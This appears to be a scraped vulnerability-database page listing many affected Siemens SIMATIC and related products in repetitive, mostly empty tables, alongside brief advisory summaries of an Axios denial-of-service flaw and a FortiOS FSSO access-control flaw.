vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Axios is vulnerable to denial of service attacks due to unbounded memory allocation for `data:` URIs in versions prior to 0.30.2 and 1.12.0, with additional security issues noted in HPE and Oracle products.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
A vulnerability in Fortinet FortiOS versions 7.0 through 7.6.4, specifically in the FSSO Terminal Services Agent, allows an authenticated user with knowledge of FSSO policy configurations to gain unauthorized access to protected network resources via crafted requests due to improper verification of the communication channel source.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
